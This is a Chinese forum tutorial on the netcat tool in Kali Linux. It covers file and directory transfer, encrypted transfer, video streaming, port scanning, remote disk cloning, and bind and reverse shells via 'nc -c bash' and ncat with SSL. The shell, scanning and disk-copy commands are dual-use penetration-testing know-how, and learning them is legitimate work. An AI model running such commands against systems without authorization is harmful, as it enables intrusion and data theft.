kali中NC工具的使用方法 - X黑手网-Kali Linux论坛-电脑端-X黑手网

kali中NC工具的使用方法

基本工具:nc

Nc -h(查询nv可用的参数)
Nv -v(查看连接过程中的详细信息)
Nv -n(后面指定IP地址,如果后面输入域名不会进行DNS解析)

NC用于传输文件

1.Nc -lp 333 > 文件名(随便取名字)//接收端开启侦听端口
2.nc -nv 1【接收端地址】 333 < 需要发送的文件名  -q 1 //输入接收端地址和端口,-q表示接收成功后1秒关闭进程

或者

1.Nc -q 1 -lp 333 < 需要发送的文件名
2.nc -nv【发送端地址】 333 > 文件名

Nc用于传输目录

发送端:tar -cvf - music/ | nc -lp 333 -q 1 //打包music文件夹并打开333端口侦听发送打包后的文件,-q为传输成功后一秒关闭连接


接收端:nc -nv 【发送端地址】 333 | tar -xvf - //接收打包的文件并对其解包

NC用于加密传文件

接收端:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb >文件名
// 打开并侦听一个端口,通过mcrypt命令进行解密,加密方法为ecb,加密密钥为rijindael-256,--flush为不会在本地保存,加密后重定向到【文件名】


发送端:mcrypt --flush -Fbq -a rijndael-256 -m ecb <[需要发送的文件] | Nc -nv 1.1.1.1 333 -q 1  //通过加密算法加密一个文件(此方法为对称加密),之后连接接收端的端口

NC用于流媒体服务

发送视频端:cat 【视频文件名】 | nc -lp 333 //打开一个视频文件并开启侦听一个端口
接收视频端:nc -nv 【发送端地址】 333 | mplayer -vo xll -cache 3000-   //输入发送端地址和端口号,通过mplayer去播放发送端的视频,最大缓存3000字节,(接收视频端本地不会保存视频,只会实时播放发送端的视频文件)

NC用于端口扫描

Nc -nvz 1.1.1.1 1-65535 //z表示只会扫描端口是否开放,不进行连接
Nc -vnzu 1.1.1.1 1-1024 //默认只会扫描tcp端口,加u表示扫描UDP端口

NC用于远程克隆硬盘

克隆硬盘端:Nc -lp 333 | dd of=/dev/sda
被克隆硬盘端:Dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1
远程克隆硬盘可以用于远程电子取证,可以将目标服务器硬盘远程复制,或者内存。

NC用于远程控制

正向:
A:nc -lp 333 -c bash
B:nc 1.1.1.1 333


反向:
A:nc -lp 333
B:nc 1.1.1.1 333 -c bash
注:windows用户把bash改为CMD

NC缺点

1.NC缺乏加密和身份验证的能力;(容易被人嗅探)

2.Ncat包含于nmap工具包中;

通过隧道加密通道实现远程控制

A:ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl //被控制端  allow指定允许哪个地址进行连接
B:ncat -nv 1.1.1.1 333 --ssl  //控制端

不同

 

image

 

系统/ 平台的nc参数功能不尽相同